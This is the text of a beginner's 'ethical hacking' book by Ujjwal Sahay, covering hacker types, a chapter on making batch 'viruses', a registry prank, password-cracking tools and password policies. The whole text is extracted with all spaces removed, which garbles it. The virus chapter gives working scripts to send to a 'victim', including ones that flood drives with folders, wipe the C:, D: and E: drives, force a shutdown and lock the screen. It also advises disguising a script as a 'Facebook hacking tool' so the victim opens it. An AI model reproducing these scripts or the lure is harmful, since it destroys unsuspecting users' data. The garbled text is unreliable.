BY:UJJWALSAHAYCO-FOUNDER[www.thebigcomputing.com]

FINDOUTMORESTUFFLIKETHISON

TheBigComputing.com

WecoveruniqueEthicalHackingandPerformanceimprovementguides,NewsandTutorials.Ouraimistomakeyourdigitallifeeasy,pleasantandsecure.Ujjwalisaregularauthorandalsochiefsecurityadministratorattheplace,youcangetsolutionofyourqueries

LEGALDISCLAIMER

Anyproceedingsoractivitiesregardingthematerialcontainedwithinthisvolumeareexclusivelyyourliability.Themisuseandmistreatoftheinformation/tutorialinthisbookcanconsequenceinunlawfulchargesbroughtagainstthepersonsinquestion.Theauthorsandreviewanalyzerswillnotbeheldresponsibleintheeventanyunlawfulchargesbroughtagainstanyindividualsbymisusingtheinformationinthisbooktobreakthelaw.Thisbookcontainsmaterialandresourcesthatcanbepotentiallydestructiveordangerous.Ifyoudonotfullycomprehendsomethingonthisbook,don‘tstudythisbook.Pleaserefertothelawsandactsofyourstate/region/province/zone/territoryorcountrybeforeaccessing,using,orinanyotherwayutilizingtheseresources.Thesematerialsandresourcesareforeducationalandresearchpurposesonly.Donotattempttoviolatethelawwithanythingenclosedherewithin.Ifthisisyourintention,thenleavenow.Neitherwriterofthisbook,reviewanalyzers,thepublisher,noranyoneelseaffiliatedinanyway,isgoingtoadmitanyresponsibilityforyourproceedings,actionsortrials.

ABOUTTHEAUTHOR…

UJJWALSAHAYisasovereignComputerSecurityConsultantandhasstate-of-the-artfamiliarityinthefieldofcomputer.Also,UJJWALSAHAYisacyber-securityexpertcertifiedbyLUCIDEUSTECHandhasdefinitiveexperienceinthefieldofcomputersandethicalhacking.UjjwalSahayistheAuthorofthebookHACK-X

CRYPT(AstraightforwardguidetowardsEthicalhackingandcybersecurity).Also,UjjwalSahayistheCo-founderofthetechno-hackingwebsitewww.thebigcomputing.com,heisthechiefsecurityconsultantofsite.Sahayishowever,morewellknownforhissignificantworkinthefieldofethicalhackingandcybersecurity.SahayiscurrentlypursuinghisstudiesincomputersciencewithspecializationincybersecurityatMITSGWALIOR.GetInTouchWithHimAt

ujjwal@thebigcomputing.com

PREFACE

Computerhackingisthepracticeofalteringcomputerhardwareandsoftwaretocarryoutagoaloutsideofthecreator‘soriginalintention.Peoplewhoslotincomputerhackingactionsandactivitiesareoftenentitledashackers.Themajorityofpeopleassumethathackersarecomputercriminals.Theyfallshorttoidentifythefactthatcriminalsandhackersaretwoentirelyunrelatedthings.Hackersinrealismaregoodandextremelyintelligentpeople,whobyusingtheirknowledgeinaconstructivemodehelporganizations,companies,government,etc.tosecurecredentialsandsecretinformationontheInternet.Yearsago,noonehadtoworryaboutCrackersbreakingintotheircomputerandinstallingTrojanviruses,orusingyourcomputertosendattacksagainstothers.Nowthatthinghavechanged,it’sbesttobeawareofhowtodefendyourcomputerfromdamagingintrusionsandpreventblackhathackers.So,inthisBookyouwilluncoverthefinestwaystodefendyourcomputersystemsfromthehackersThisBookiswrittenbykeepingoneobjectinmindthatabeginner,whoisnotmuchfamiliarregardingcomputerhacking,caneasily,attemptsthesehacksandrecognizewhatwearetryingtodemonstrate.AfterReadingthisbookyouwillcometorecognizethathowHackingisaffectingoureverydayroutineworkandcanbeveryhazardousinmanyfieldslikebankaccounthackingetc.Moreover,aftercarryingoutthisvolumeindetailyouwillbecapableofunderstandingthathowahackerhacksandhowyoucandefendyourselffromthesethreats.

FORANYQUERIESANDSUGGESTIONSFEELFREETOCONTACTME:ujjwal@thebigcomputing.com

InTheLovingMemoryofmyDAD

YourhandssowarmYourvoicesoclearIstillrememberyourlaughterLikeyesterdayhadnevergoneImissyourwordsofencouragementWordsthatkeptmehangingonNowyouaregoneThetearskeepflowingOnlyhopingThatonedaythepainwillfadeDadwhydidyouhavetogoawayWeloveyouandmissyouIknowIwillagainseeyousomeday

ACKNOWLEDGEMENTS…

Bookorvolumeofthistemperamentistremendouslycomplextowrite,particularlywithoutsupportoftheAlmightyGOD.IamhighlythankfultoLATEDR.BAKSHIKAMESHWARSRIVASTAVA,MRS.SHASHIBALASRIVASTAVA,Mr.BAKSHIRAJESHPRASADSINHAANDMRS.ARADHNASINHAtotrustonmycapabilities,withouttheirsupportandmotivationitwouldnotbepromisingtowritethisbook.IexpressheartfeltcredittoMyParentsLATEPROF.SAMIRKUMARSAHAYandMRS.SUMANSAHAYwithoutthemIhavenoexistence.IamalsothankingMR.BAKSHIRAJEEVPRASADSINHA,MRS.ANITASINHA,MR.BAKSHISANJEEVPRASADSINHA,MRS.PRITYSINHA,MR.RAJESHWARPRASADandMRS.PUNAMSINHAwhohelpedmeateachandeverystepofmylifebytheirprecioussupport.

IammorethaneverthankfultomycolleagueSaurabhTripathi(Creativehead@THEBIGCOMPUTING)forthereview,analysisandsuggestionsforsomegoodarticlesforthisbookandallindividualswhofacilitatedmeatvariousresearchstagesofthisvolume.

UJJWALSAHAY

FOOLISHASSUMPTIONS…

Imakeafewassumptionsaboutyou:You’refamiliar withbasiccomputer-,networking–relatedconceptsandterms.Youhaveabasicunderstandingofwhathackersandmalicioususersdo.Youhaveaccesstoacomputerandanetworkonwhichtousethesetechniques.YouhaveaccesstotheInternettoobtainthevarioustoolsusedintheethicalhackingprocess.Youhavepermissiontoperformthehackingtechniquesdescribedinthisbook.

TableofContents

INTRODUCTIONTOHACKERS……………………………………………………………..17CommunitiesofHackers:-………………………………………………………………..17INTENSIONOFHACKERS:…………………………………………………………………17TypesofHackers:

……………………………………………………………………………….18•WhiteHatHackers…………………………………………………………………………..18•BlackHatHackers……………………………………………………………………………18•GreyHatHackers……………………………………………………………………………..18CRACKERS…………………………………………………………………………………………..19Intensionofcrackers:-………………………………………………………………………19PHREAKS…………………………………………………………………………………………….19Intentionofphreaks:-………………………………………………………………………..19SCRIPTKIDDIES:-………………………………………………………………………………20Intentionofscriptkiddies:-……………………………………………………………….20BlackHatHackersStrategy:-……………………………………………………………20HACKERSWANTYOURPC…………………………………………………………………..23CREATIONOFVIRUSINNOTEPAD……………………………………………………..26

1.)Tocreateahugeamountoffoldersonvictim’sdesktopscreen:……………………………………………………………………………………………………………..262.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:……………………………………………………………………………………………………………..29

3.)ToformatC,D:andE:driveofyourcomputer:-…………………………304.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:-………………………………………………………………………………………….30

5.)OpenNotepad,slowlytype“Hello,howareyou?Iamgoodthanks”andfreakyourfriendout:-………………………………………………………………..316.)Hackyourfriend’skeyboardandmakehimtype“Youareafool”simultaneously:-………………………………………………………………………………..33

7.)OpenNotepadcontinuallyinyourfriend’scomputer:……………….338.)THRETENYOURFRIENDBYMAKINGSCREENFLASH……………..34ConvertBatchfilesintoExecutablePrograms…………………………………..37HACKING“OPEN”OPTION…………………………………………………………………..42PASSWORDCRACKING………………………………………………………………………..50Crackingpasswordswithhardcoretools…………………………………………51

Password-crackingsoftware:-…………………………………………………………51Cain&Abel:-……………………………………………………………………………………….51Brutus:-……………………………………………………………………………………………….52ElcomsoftDistributedPasswordRecovery:……………………………………52ElcomsoftSystemRecovery:…………………………………………………………….52JohntheRipper…………………………………………………………………………………..52ophcrack……………………………………………………………………………………………..53Aircrack-NG………………………………………………………………………………………..53ProactiveSystemPasswordRecovery…………………………………………….53RainbowCrack……………………………………………………………………………………53pwdump3……………………………………………………………………………………………54PASSWORDCREATINGPOLICIES………………………………………………………..57BYPASSWINDOWSLOGONSCREENPASSWORD…………………………….60KEYSTROKELOGGING………………………………………………………………………….63LearnHowtoHackWindowsExperienceIndex…………………………………66HACKTOHIDELOCALDRIVES…………………………………………………………….71FORMATHARDDISKWITHNOTEPAD……………………………………………….78FUNNYVIRUSTOSHOCKYOURFRIENDS………………………………………….81HOWTOCHANGEYOURPROCESSORNAME……………………………………85HOWTOMAKEYOURGOOGLESEARCHSEFFECTIVE………………………93IOSPASSWORDCRACKING………………………………………………………………….96HACKTOHIDETHERECYCLEBIN……………………………………………………..103HOWBOTNETDDoSATTACKWORKS………………………………………………106DDoSAttack?……………………………………………………………………………………106Botnet?……………………………………………………………………………………………..107BotnetTools……………………………………………………………………………………..108

SlowLoris…………………………………………………………………………………………..109Tor’sHammer…………………………………………………………………………………..109Qslowloris…………………………………………………………………………………………109ApacheKiller……………………………………………………………………………………..110PyLoris………………………………………………………………………………………………110DDoSim……………………………………………………………………………………………..110BotnetDDoSAttacks……………………………………………………………………….110WEBSITEHACKING……………………………………………………………………………..113TESTINGSQLINJECTIONBYUSINGTOOL………………………………………..130WI-FIHACKINGUSINGBACKTRACK………………………………………………….134NEWBIE’SWAYTOWARDSREVERSEENGINEERING……………………..143EMAILANDFACEBOOKHACKINGBYPHISHING……………………………..149SecuringPenDrivesFromMaliciousViruses……………………………………155HOWTOPROTECTYOURPDFFILESFROMCOPYING…………………….160SENDINGAMESSAGETOOTHERUSERINYOURPC……………………..166HOWTOCREATEAFOLDERWITHEMPTYNAME…………………………..170HACKINGANDROIDPHONE……………………………………………………………….173FULLCONTROLYOURPCBYPHONE………………………………………………..178LAUNCHINGWINDOWSGODMODE…………………………………………………183HOWTOCRACKANDROIDLOCKSCREEN………………………………………..187WI-FICRACKINGUSINGREAVERINBACKTRACK……………………………191SOMEUSEFULWINDOWSSHORTCUTS…………………………………………..196HOWTORECOVERPERMANENTLYDELETEDFILES………………………198CONCLUSION:-……………………………………………………………………………………203

Let’sstartINTRODUCTION

INTRODUCTIONTOHACKERS

Firstofallbeforediggingintointensehackingprocesseslet’stakealookonwhathackingis,whothehackersare,whataretheirintentions,typesofhackersandtheircommunitiesetc.

CommunitiesofHackers:

HACKERSCRACKERSPHREAKSSCRIPTKIDDIES

HACKERSaretheIntelligentComputerExperts.INTENSIONOFHACKERS:

•Togainin-depthknowledgeofanycomputersystem,whatishappeningatthebackendofanyspecificprogramofthesystembehindthescreenofthecomputersystem?

•Theirmotiveistofindpossiblesecurityriskandvulnerabilitiesinacomputersystemornetwork.

•Theycreatesecurityawarenessamongthepeoplebysharingknowledgeandpropersecuritypreventionsthatshouldbetakenbytheuser.

TypesofHackers:

•WhiteHatHackers–“Whitehats”isthenameusedforsecurityexperts.Whiletheyoftenusethesametoolsandtechniquesastheblackhats,theydosoinordertofoilthebadguys.Thatis,theyusethosetoolsforethicalhackingandcomputerforensics.Ethicalhackingistheprocessofusingsecuritytoolstotestandimprovesecurity(ratherthantobreakit!).Computerforensicsistheprocessofcollectingevidenceneededtoidentifyandconvictcomputercriminals.

•BlackHatHackers–Theyusetheirknowledgeandskillsetforillegalactivitiesanddestructiveintents.Obviously,the“blackhats”arethebadguys.Thesearethepeoplewhocreateandsendvirusesandworms,breakintocomputersystems,stealdata,shutdownnetworks,andbasicallycommitelectroniccrimes.Wetalkaboutblackhatsatseveralpointsinthisbook.Blackhathackersandmalwarewritersarenotconsideredasthesamethinginthesecuritycommunity—eventhoughtheyarebothbreakingthelaw.

•GreyHatHackersTheyusetheirknowledgeandskillsetforthelegalandillegalpurpose.Theyarewhitehatsinpublicbutinternallytheydosomeblackhatwork.Grayhatssitinthemiddleofthefencebecausesometimestheycrossthatethicalline(ormoreoften,defineitdifferently).Forexample,grayhatswillbreakintoacompany’scomputersystemjusttowanderaroundandseewhat’sthere.Theythinkthatsimplybecausetheydon’tdamageanydata,they’renotcommittingacrime.Thentheygoandapplyforjobsassecurityconsultantsforlargecorporations.Theyjustifytheirearlierbreak-inassomesort

ofcomputersecuritytraining.Manyreallybelievethatthey’reprovidingapublicservicebylettingcompaniesknowthattheircomputersareatrisk.

CRACKERSarethosewhobreakintotheapplicationswithsomemaliciousintentionseitherfortheirpersonalgainortheirgreedyachievements.

Intensionofcrackers:•Theirmotiveistogetunauthorizedaccessintoasystemandcausedamageordestroyorrevealconfidentialinformation.•Tocompromisethesystemtodenyservicestolegitimateusersfortroubling,harassingthemorfortakingrevenge.•Itcancausefinanciallosses&image/reputationdamages,defamationinthesocietyforindividualsororganizations.

PHREAKSarethosepeoplewhousecomputerdevicesandsoftwareprogramsandtheirtrickyandsharpmindtobreakintothephonenetworks.

Intentionofphreaks:

•Tofindloopholesinsecurityinphonenetworkandtomakephonecallsandaccessinternetatfreeofcost!!!Youmaygetaspoofedcallorabigamountofbill.Youcanalsogetacallwithyourownnumber.

SCRIPTKIDDIES:Thesearecomputernoviceswhotakeadvantageofthehackertools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyareverysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysarethestereotypicalhackersthatyouhearaboutinthenewsmedia,theyoftenneedonlyminimalskillstocarryouttheirattacks.

Intentionofscriptkiddies:•Theyusetheavailableinformationaboutknownvulnerabilitiestobreakintothenetworksystems.•It’sanactperformedforafunoroutofcuriosity.BlackHatHackersStrategy:•InformationGathering&Scanning•GettingAccessonthewebsite•Maintaintheaccess•CleartheTracksConclusion:Securityisimportantbecausepreventionisbetterthancure.

HACKERSWANTYOURPC

HACKERSWANTYOURPC…

Youmightbethinkingthathackersdon’tcareaboutyourcomputer,buttheydo.Hackerswantaccesstoyoursystemformanydifferentreasons.Remember,onceahackerbreaksinandplantsaTrojan,thedoorisopenforanyonetoreturn.Thehackersknowthisandaremakingmoneyofffromit.Theyknowit’seasytohideandverydifficulttotrackthembackoncetheyownyourPC.

Overall,theInternetisaneasyplacetohide.Compromisedcomputersaroundtheworldhavehelpedtomakehidingsimple.ItiseasytofindthelastIPaddressfromwhereanattackwaslaunched,buthackershopfrommanyunsecuredsystemstohidetheirlocationbeforetheylaunchattacks.

IPaddressisauniqueaddressthatidentifieswhereacomputerisconnectedtotheInternet.Everycomputer,evenyoursifyou’reusingbroadbandaccess,hasanInternetprotocol(IP)address.

Overthepastfouryears,mostcyber-attackshavebeenlaunchedfromcomputerswithintheINDIA.However,thisdoesn’tmeanthatsystemsintheINDIAaretheoriginalsourceoftheattack.AhackerinPakistancouldactuallyuseyourcomputertolaunchadenialofservice(DOS)attack.Totheentireworld,itmightevenlookasifyoustartedtheattackbecausethehackerhashiddenhistrackssothatonlythelast“hop”canbetraced

.

VIRUSCREATIONS

CREATIONOFVIRUSINNOTEPAD

Now,it’stimetoadministrateyourcomputerbycreatingsomevirusesintheformofbatchfile.Youcancreatevarioustypesofviruseswithhavingdistinctfunctionality.Eachandeveryviruswillaffectthevictim’scomputersystembythewayyouhavecodeditsprogramminginthebatchfile.Youcancreateviruseswhichcanfreezethevictim’scomputeroritcanalsocrashit.

Viruscreationcodesofthebatchfile:-—Codestobewritteninthenotepad-—Extensionofthefilesshouldbe“.bat”-

1.)Tocreateahugeamountoffoldersonvictim’sdesktopscreen:Firstofallyourtaskistocopythefollowingcodesinthenotepadofyourcomputer.Foropeningthenotepad:Gotorunoptionofyourcomputerbypressing“window+R”.Simplytype“notepad”andclickontheOKoption.

CODES:@echooff:topmd%random%gototop.

Nowwhenyouhavecopiedthecodesinthenotepadyournextworkistosavethetextdocumentyouhavecreated.Gotofileoptionandsaveyourdocumentbyanynamebut“don’tforgettokeeptheextensionas‘.bat’.

Forexampleyoucansaveyourtextdocumentbythename“ujjwal.bat”

Oryoucanalsokeepyourdocumentnameas“Facebookhackingtool.bat”toconfusethevictimandenforcehimtoopenthevirusyouhavecreatedtodestroythedesktopofthevictim.

Whenyouhavedonesavingthedocumentjustdoubleclickonthebatchfiletoopenit.

Suddenlyyouwillseethatthecommandpromptofthevictim’scomputeropenedautomaticallyanditwilldisplaylargeamountofcodestorunninginthecommandprompt.After5-10secondsyouwillseethatthereareahugeamountoffolderscreatedautomaticallyonthedesktopofthevictimanditwillalsoleadsthedesktoptofreezeorcrash.

2.)TocreatemorefoldersinC,D,andEdriveofvictim’scomputer:-

Aswehavelearnedabovetocreatemanyfoldersonthedesktopofthevictim,inthesamewaywecancreatealotoffoldersintheC:,D:,andE:drivesofthevictimscomputerbyapplyingthesamemethodaswehavefollowedabovebutthereisalittleamendmentinthecodesofthebatchfileofthisvirus.

CODES:@echooff

:VIRUScd/dC:md%random%cd/dD:md%random%cd/dE:md%random%gotoVIRUS

Copyandpastetheabovecodeinthenotepadandfollowthesamestepsaswehavefollowedbeforetocreatemorenumbersoffoldersinthelocaldrivesofthevictim’scomputer.

3.)ToformatC,D:andE:driveofyourcomputer:

OpenNotepadCopythebelowcommandthere“rd/s/qD:\rd/s/qC:\rd/s/qE:"(Withoutquotes)Saveas“anything.bat

Doubleclickonthevirusicon.ThisvirusformatstheC,DandEDrivein5Seconds.4.)Conveyyourfriendalittlemessageandshutdownhis/hercomputer:

@echooffmsg*Idon’tlikeyoushutdown-c“Error!Youaretoostupid!”-s

Saveitas“Anything.BAT”inAllFilesandsendit.

5.)OpenNotepad,slowlytype“Hello,howareyou?Iamgoodthanks”andfreakyourfriendout:

Openthenotepadandtypethefollowingcode:WScript.Sleep180000WScript.Sleep10000SetWshShell=WScript.CreateObject(“WScript.Shell”)WshShell.Run“notepad”WScript.Sleep100WshShell.AppActivate“Notepad”WScript.Sleep500WshShell.SendKeys“Hel”WScript.Sleep500WshShell.SendKeys“lo“WScript.Sleep500WshShell.SendKeys“,ho”WScript.Sleep500WshShell.SendKeys“wa”WScript.Sleep500WshShell.SendKeys“re“WScript.Sleep500WshShell.SendKeys“you”WScript.Sleep500WshShell.SendKeys“?”WScript.Sleep500WshShell.SendKeys“Ia”WScript.Sleep500WshShell.SendKeys“mg”WScript.Sleep500WshShell.SendKeys“ood”WScript.Sleep500WshShell.SendKeys”th”WScript.Sleep500WshShell.SendKeys“ank”WScript.Sleep500

WshShell.SendKeys“s!“

Saveitas“Anything.VBS”andsendit.6.)Hackyourfriend’skeyboardandmakehimtype“Youareafool”simultaneously:Openthenotepadandtypethefollowingcodes:

SetwshShell=wscript.CreateObject(“WScript.Shell”)dowscript.sleep100wshshell.sendkeys“Youareafool.”loop

Saveitas“Anything.VBS”andsendit.7.)OpenNotepadcontinuallyinyourfriend’scomputer:

Openthenotepadandtypethefollowingcodes:@ECHOoff:topSTART%SystemRoot%\system32\notepad.exeGOTOtop

Saveitas“Anything.BAT”andsendit.8.)THRETENYOURFRIENDBYMAKINGSCREENFLASH

Tomakeareallycoolbatchfilethatcanmakeyourentirescreenflashrandomcolorsuntilyouhitakeytostopit,simplycopyandpastethefollowingcodeintonotepadandthensaveitasa.batfile.

@echooffechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbg

ButifyoureallywanttomesswithafriendthencopyandpastethefollowingcodewhichwilldothesamethingexceptwhentheypressakeythescreenwillgoblackandtheonlywaytostopthebatchfileisbypressingCTRL-ALT-DELETE.Codes:

@echooff:aechoe100B81300CD10E44088C3E44088C7F6E330>\z.dbgechoe110DF88C1BAC80330C0EEBADA03ECA80875>>\z.dbgechoe120FBECA80874FBBAC90388D8EE88F8EE88>>\z.dbgechoe130C8EEB401CD1674CDB80300CD10C3>>\z.dbgechog=100>>\z.dbgechoq>>\z.dbgdebug<\z.dbg>nuldel\z.dbggotoa

Todisableerror(ctrl+shirt+esc)thenendprocesswscript.exeEnjoy!!!Note:-someoftheabovegivencodescanharmyourcomputerafterexecutionso;don’ttryitonyourpc.You

canuseatestcomputerforit.

BATCHTOEXECONVERSION

ConvertBatchfilesintoExecutablePrograms

Thebatchfilesandtheexecutablefilesworkinalmostsimilarway.Basicallybothareasmuchasasetofinstructionsandlogicsforthecommandexecution.Butmorepreferablywetreatexecutablefilesastheyaremoreconvenientthanbatchone.Butwhywouldwewantthat?Someofthereasonsarelistedbelow:1.WecanincludeextratoolsinourEXEdependentbatchfile.

2.MoreoverEXEprovidesprotectiontothesourcescripttorestrictmodification.3.EXEfilescanbepinnedtowindowsstartmenuaswellasinthetaskbar.Hereweareusingatoolcalled“Batchtoexeconverter”whichprovidesyouaplatformtorunthebatchfilesasexecutablefiles.Youcandownloaditfromhere

“BattoExeConverter”isaflowconversionprogramwhosepurposeistohelpyoutoeasilyobtainexecutablefilesoutofbatchitems.IfyouprefertoconvertaBATCHfileintoanexecutableoneeasily,“BattoExeConverter”isasimpleandyeteffectivesolution.

Theapplicationprovidesyouwithasimplifiedinterface,whichmakesitcomfortableforbothbeginnerandadvancedusers.Fromitsprimarywindow,youhavetheabilitytoselectthedesiredbatchfileandoutputfile.Then,youwillbeabletocustomizeyoursettingsaccordingtoyourchoiceandpreferences.

AnotherinterestingandcompactiblefeatureisthatyoucanchoosethelanguageforyourEXEfile,thechoicesbeingEnglishorGerman.FromtheOptionstab,userscanopttocreateavisibleorinvisibleapplication,whichmeansdisplayingaconsolewindowornot.However,ifyouwanttoencrypttheresultingEXEfile,youcanprotectitwithasecuritypassword.

MESSINGUPWITHREGISTRY

HACKING“OPEN”OPTION

IfwewanttoopenanyfoldereitherweusetodoubleclickonthefolderorwejustrightclickonthefolderanditwillshowusadialogueboxwithOPENoptionatthetopofthedialoguebox.

Andtodaywearegoingtolearnthathowtohackthe“OPEN”optionbyanytextbywhichyouwanttoreplaceit.STEPS:Goto“run”optionandtype“regedit”andclickonok.Note:“regedit”standsforregistryediting.

Registry:-itisresponsibleforsavingthebinaryequivalentworkingofeveryapplicationinoperatingsystem.

Thenawindowwillopeninfrontofyouofregistryediting.Ithasfiveoptions.

1.HKEY_CLASSES_ROOT2.HKEY_CURRENT_USER3.HKEY_LOCAL_MACHINE4.HKEY_USERS5.HKEY_CURRENT_CONFIG

Thenyouhavetoclickon“HKEY_CLASSES_ROOT”Itwillopenandyouseealotofitemsunderit.Searchforthe“FOLDER”optionunderit.

Clickonthefolderoptiontoopenit.Whenyouopenfolderoptionyouwillseethe“SHELL”option.Byopeningthe“SHELL”optionyouwillseethe“OPEN”optionunderit.JustgiveasingleclickontheopenoptioninsteadopeningitYouwillseetwoitemsdefinedintheleftwhiteworkspace.

Justopenthe“Default”string(1stoption).Donottouchthevaluename.Typeanythingbywhichyouwanttoreplaceyour“open”option.

ForexampleIamtypingherethat“yourcomputerishackedbyUjjwalSahay”.

Thenclickonokoption.Nowgoonanyfolderandjustgivearightclicktoit.

Woooooo!Nowtheopenoptionischangedbythetext“yourcomputerishackedbyUjjwalSahay”.

PASSWORDCRACKINGEXPLAINED

PASSWORDCRACKING

Passwordcrackersarethemostfamousandelementarytoolsinthehacker’stoolbox.Thesehavebeenaroundforsometimeandarefairlyeffectiveat“guessing”mostusers’passwords,atleastinpartbecausemostusersdoaverypoorjobofselectingsecurepasswords.

Firstofallifahackerisgoingtocrackyourpasswordthenattheveryfirststeptheyusuallytrysomeguessestocrackyourpassword.Theygenerallymadeiteasybysocialengineering.Hackersknowthatmostusersselectsimplepasswordsthatareeasytoremember.Thetopchoicesoftheusersarenearlyalwaysnamesthatarepersonallymeaningfultotheuser—firstnamesofimmediatefamilymembersleadthelist,followedbypet’snamesandfavoritesportingteams.PasswordcrackersmayenduploadingfullEnglishdictionaries,buttheycanhitafairnumberofpasswordswiththecontentsofanypopularbabynamebook.Otherpoorpasswordselectionsincludecommonnumbersandnumbersthatfollowacommonformatsuchasphonenumbersandsocialsecuritynumbers.

Compoundingtheproblem,manyuserssetthesameusernameandpasswordforallaccounts,allowinghackerstohaveafielddaywithasingleharvestedpassword.That’ssomethingtoconsiderbeforeyouusethesamepasswordforFacebookasyouuseatschooloratwork.Thekeytocreatingagoodpasswordistocreatesomethingthatsomeonecannotguessoreasilycrack.Usingyourpet’snamethereforeisnotagoodtechnique.Usingyourloginnameisalsoabadtechniquebecausesomeonewhoknowsyourlogin(oryourname,sincemanyloginnamesaresimplyvariationsonyoursurname),couldeasilybreakintoyoursystem.

Crackingpasswordswithhardcoretools

High-techpasswordcrackinginvolvesusingaprogramthattriestoguessapasswordbydeterminingallpossiblepasswordcombinations.Thesehigh-techmethodsaremostlyautomatedafteryouaccessthecomputerandpassworddatabasefiles.Themainpassword-crackingmethodsaredictionaryattacks,bruteforceattacks,andrainbowattacks.Youfindouthoweachoftheseworkinthefollowingsections.

Password-crackingsoftware:Youcantrytocrackyourorganization’soperatingsystemandapplicationpasswordswithvariouspassword-crackingtools:

Cain&Abel:CainandAbelisawell-knownpasswordcrackingtoolthatiscapableofhandlingavarietyoftasks.ThemostnotablethingisthatthetoolisonlyavailableforWindowsplatforms.Itcanworkassnifferinthenetwork,crackingencryptedpasswordsusingthedictionaryattack,bruteforceattacks,cryptanalysisattacks,revealingpasswordboxes,uncoveringcachedpasswords,decodingscrambledpasswords,andanalyzingroutingprotocols.ItusetocracksLMandNTLanManager(NTLM)hashes,WindowsRDPpasswords,CiscoIOSandPIXhashes,VNCpasswords,RADIUShashes,andlots

more.(Hashesarecryptographicrepresentationsofpasswords.)

Brutus:Brutusisoneofthemostpopularremoteonlinepasswordcrackingtools.Itclaimstobethefastestandmostflexiblepasswordcrackingtool.ThistoolisfreeandisonlyavailableforWindowssystems.ItwasreleasedbackinOctober2000.

ItsupportsHTTP(BasicAuthentication),HTTP(HTMLForm/CGI),POP3,FTP,SMB,TelnetandothertypessuchasIMAP,NNTP,NetBus,etc.Youcanalsocreateyourownauthenticationtypes.Thistoolalsosupportsmulti-stageauthenticationenginesandisabletoconnect60simultaneoustargets.Italsohasresumedandloadoptions.So,youcanpausetheattackprocessanytimeandthenresumewheneveryouwanttoresume.

ElcomsoftDistributedPasswordRecovery:

(www.elcomsoft.com/edpr.html)cracksWindows,MicrosoftOffice,PGP,Adobe,iTunes,andnumerousotherpasswordsinadistributedfashionusingupto10,000networkedcomputersatonetime.Plus,thistoolusesthesamegraphicsprocessingunit(GPU)videoaccelerationastheElcomsoftWirelessAuditortool,whichallowsforcrackingspeedsupto50timesfaster.

ElcomsoftSystemRecovery:(www.elcomsoft.com/esr.html)cracksOrresetsWindowsuserpasswords,setsadministrativerights,andresetspasswordexpirationsallfromabootableCD.

JohntheRipper:-(www.openwall.com/john)JohntheRipperisanotherwell-knownfreeopensourcepasswordcrackingtoolforLinux,UNIXandMacOSX.AWindowsversionisalsoavailable.Thistoolcandetectweakpasswords.Aproversionofthetoolisalsoavailable,whichoffersbetterfeaturesandnativepackagesfortargetoperatingsystems.

ophcrack:(http://ophcrack.sourceforge.net)cracksWindowsUserpasswordsusingrainbowtablesfromabootableCD.Rainbowtablesarepre-calculatedpasswordhashesthatcanhelpspeedupthecrackingprocess.

Aircrack-NG:-(http://www.aircrack-ng.org/)Aircrack-NGisaWiFipasswordcrackingtoolthatcancrackWEPorWPApasswords.Itanalyzeswirelessencryptedpacketsandthentriestocrackpasswordsviaitscrackingalgorithm.ItisavailableforLinuxandWindowssystems.AliveCDofAircrackisalsoavailable.

ProactiveSystemPasswordRecovery:

(www.elcomsoft.com/pspr.html)recoverspracticallyanylocallystoredWindowspassword,suchAslogonpasswords,WEP/WPApassphrases,SYSKEYpasswords,andRAS/dialup/VPNpasswords.

RainbowCrack:-(http://project-rainbowcrack.com)RainbowCrackisahashcrackertoolthatusesalarge-scaletime-memorytradeoffprocessforfasterpasswordcrackingthantraditionalbruteforcetools.Time-memorytradeoffisacomputationalprocessinwhichallplaintextandhashpairsarecalculatedbyusingaselectedhashalgorithm.Aftercomputation,resultsarestoredintherainbowtable.Thisprocessisverytimeconsuming.But,oncethetableisready,itcancrackapasswordmustfasterthanbruteforcetools.

Youalsodonotneedtogeneraterainbowtabletsbyyourselves.DevelopersofRainbowCrackhavealsogeneratedLMrainbowtables,NTLMrainbowtables,MD5rainbowtablesandSha1rainbowtables.LikeRainbowCrack,thesetablesarealsoavailableforfree.Youcandownloadthesetablesanduseforyourpasswordcrackingprocesses.

pwdump3:-(www.openwall.com/passwords/microsoftwindowsnt-2000-xp-2003-vista-7#pwdump)passwordhashesfromtheSAM(Securitydatabase.extractsAccountsWindowsManager)

Passwordstoragelocationsvarybyoperatingsystem:Windowsusuallystorespasswordsintheselocations:

•ActiveDirectorydatabasefilethat’sstoredlocallyorspreadacrossdomaincontrollers(ntds.dit)WindowsmayalsostorepasswordsinabackupoftheSAMfileinthec:\winnt\repairorc:\windows\repairdirectory.

•SecurityAccountsManager(SAM)database(c:\winnt\system32\config)or(c:\windows\system32\config)

SomeWindowsapplicationsstorepasswordsintheRegistryorasplaintextfilesontheharddrive!Asimpleregistryorfile-systemsearchfor“password”mayuncoverjustwhatyou’relookingfor.

LinuxandotherUNIXvariantstypicallystorepasswordsinthesefiles:•/etc/passwd(readablebyeveryone)•/etc/shadow(accessiblebythesystemandtherootaccountonly)•/.secure/etc/passwd(accessiblebythesystemandtherootaccountonly)•/etc/security/passwd(accessiblebythesystemandtherootaccountonly)

MUSTHAVEPASSWORDPOLICIES

PASSWORDCREATINGPOLICIES

Asanethicalhacker,youshouldshowuserstheimportanceofsecuringtheirpasswords.Herearesometipsonhowtodothat:

Demonstratehowtocreatesecurepasswords:-generallypeopleusetocreatetheirpasswordsusingonlywords,whichcanbelesssecure.

Showwhatcanhappenwhenweakpasswordsareusedorpasswordsareshared.Diligentlybuilduserawarenessofsocialengineeringattacks:Encouragetheuseofastrongpassword-creationpolicythatincludesthefollowingcriteria:Usepunctuationcharacterstoseparatewords.

Useupperandlowercaseletters,specialcharacters,andnumbers.Neveruseonlynumbers.Suchpasswordscanbecrackedquickly.

Changepasswordsevery15to30daysorimmediatelyifthey’resuspectedofbeingcompromised.

